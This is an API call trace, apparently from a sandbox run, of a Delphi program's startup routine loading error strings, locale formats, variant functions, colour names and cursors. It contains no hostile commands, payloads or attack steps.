[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffd7, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffd6, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffe8, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0169.870] LoadStringA (in: hInstance=0x2830000, uID=0xffe9, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xffea, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xffe7, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xffe5, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xffe3, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xffe2, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xffe1, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xffe0, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xffff, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfffe, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfffd, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfffc, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfffb, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfffa, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfff9, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfff8, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfff7, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfff6, lpBuffer=0x1af480, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xfff4, lpBuffer=0x1af46c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0169.871] LoadStringA (in: hInstance=0x2830000, uID=0xffe4, lpBuffer=0x1af46c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0169.871] GetVersionExA (in: lpVersionInformation=0x1af804*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2830000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x83\x02·\"\x83\x02\x9cø\x1a") | out: lpVersionInformation=0x1af804*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0169.871] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0169.871] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0169.871] GetThreadLocale () returned 0x409
[0169.871] GetThreadLocale () returned 0x409
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Jan") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="January") returned 8
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Feb") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="February") returned 9
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Mar") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="March") returned 6
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Apr") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="April") returned 6
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="May") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="May") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Jun") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="June") returned 5
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Jul") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="July") returned 5
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Aug") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="August") returned 7
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Sep") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="September") returned 10
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Oct") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="October") returned 8
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Nov") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="November") returned 9
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Dec") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="December") returned 9
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Sun") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Sunday") returned 7
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Mon") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Monday") returned 7
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Tue") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Tuesday") returned 8
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Wed") returned 4
[0169.872] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Wednesday") returned 10
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Thu") returned 4
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Thursday") returned 9
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Fri") returned 4
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Friday") returned 7
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Sat") returned 4
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x1af6dc, cchData=256 | out: lpLCData="Saturday") returned 9
[0169.873] GetThreadLocale () returned 0x409
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x1af738, cchData=256 | out: lpLCData="$") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x1af738, cchData=256 | out: lpLCData="0") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x1af738, cchData=256 | out: lpLCData="0") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x1af830, cchData=2 | out: lpLCData=",") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x1af830, cchData=2 | out: lpLCData=".") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x1af738, cchData=256 | out: lpLCData="2") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x1af830, cchData=2 | out: lpLCData="/") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x1af738, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0169.873] GetThreadLocale () returned 0x409
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af704, cchData=256 | out: lpLCData="1") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x1af738, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0169.873] GetThreadLocale () returned 0x409
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af704, cchData=256 | out: lpLCData="1") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x1af830, cchData=2 | out: lpLCData=":") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x1af738, cchData=256 | out: lpLCData="AM") returned 3
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x1af738, cchData=256 | out: lpLCData="PM") returned 3
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x1af738, cchData=256 | out: lpLCData="0") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x1af738, cchData=256 | out: lpLCData="0") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x1af738, cchData=256 | out: lpLCData="0") returned 2
[0169.873] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x1af830, cchData=2 | out: lpLCData=",") returned 2
[0169.873] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0169.873] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0169.874] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0169.875] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0169.875] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0169.875] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0169.875] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0169.875] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0169.875] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0169.875] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0169.875] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0169.875] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0169.875] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0169.875] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0169.875] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0169.876] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0169.876] GetDC (hWnd=0x0) returned 0x6f01071a
[0169.876] GetDeviceCaps (hdc=0x6f01071a, index=90) returned 96
[0169.876] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0169.876] GetDC (hWnd=0x0) returned 0x6f01071a
[0169.876] GetDeviceCaps (hdc=0x6f01071a, index=104) returned 0
[0169.876] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0169.876] CreatePalette (plpal=0x1af494) returned 0x5a080872
[0169.876] GetStockObject (i=7) returned 0x1b00017
[0169.876] GetStockObject (i=5) returned 0x1900015
[0169.876] GetStockObject (i=13) returned 0x18a002e
[0169.876] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0169.876] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff3d, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff3c, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff3b, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff3a, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff39, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff38, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff37, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff36, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff35, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0169.876] LoadStringA (in: hInstance=0x2830000, uID=0xff34, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xff33, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xff32, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xff31, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xff30, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xff4f, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xff4e, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xff4d, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xff4c, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0169.877] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0169.877] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0169.877] GetCurrentThreadId () returned 0x84c
[0169.877] GlobalAddAtomA (lpString="WndProcPtr028300000000084C") returned 0xc109
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xfefc, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xfefb, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xfefa, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xfef9, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xfef8, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xfef7, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xfef6, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xfef5, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0169.877] LoadStringA (in: hInstance=0x2830000, uID=0xfef4, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xfef3, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xfef2, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xfef1, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xfef0, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff0f, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff0e, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff0d, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff0c, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff0b, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff0a, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff09, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff08, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff07, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff06, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff05, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff04, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff03, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff02, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff01, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff00, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff1f, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff1e, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff1d, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff1c, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff1b, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff1a, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff19, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff18, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff17, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff16, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff15, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff14, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0169.878] LoadStringA (in: hInstance=0x2830000, uID=0xff13, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0169.879] LoadStringA (in: hInstance=0x2830000, uID=0xff12, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0169.879] LoadStringA (in: hInstance=0x2830000, uID=0xff11, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0169.879] LoadStringA (in: hInstance=0x2830000, uID=0xff10, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0169.879] LoadStringA (in: hInstance=0x2830000, uID=0xff2f, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0169.879] LoadStringA (in: hInstance=0x2830000, uID=0xff2e, lpBuffer=0x1af490, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0169.879] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0169.879] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0169.879] GetVersion () returned 0x1db10106
[0169.879] GetCurrentProcessId () returned 0x844
[0169.879] GlobalAddAtomA (lpString="Delphi00000844") returned 0xc10f
[0169.879] GetCurrentThreadId () returned 0x84c
[0169.879] GlobalAddAtomA (lpString="ControlOfs028300000000084C") returned 0xc108
[0169.879] RegisterClipboardFormatA (lpszFormat="ControlOfs028300000000084C") returned 0xc180
[0169.879] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0169.879] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0169.879] GetSystemMetrics (nIndex=19) returned 1
[0169.879] GetSystemMetrics (nIndex=75) returned 1
[0169.879] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2951320, fWinIni=0x0 | out: pvParam=0x2951320) returned 1
[0169.879] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0169.879] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0169.879] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ff9) returned 0xc0219
[0169.880] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0169.880] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0169.880] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0169.880] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffa) returned 0xd0217
[0169.880] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffb) returned 0xa0145
[0169.880] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffc) returned 0xf0135
[0169.880] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffd) returned 0x4011f
[0169.880] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7fff) returned 0x170105
[0169.881] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffe) returned 0xc021d
[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
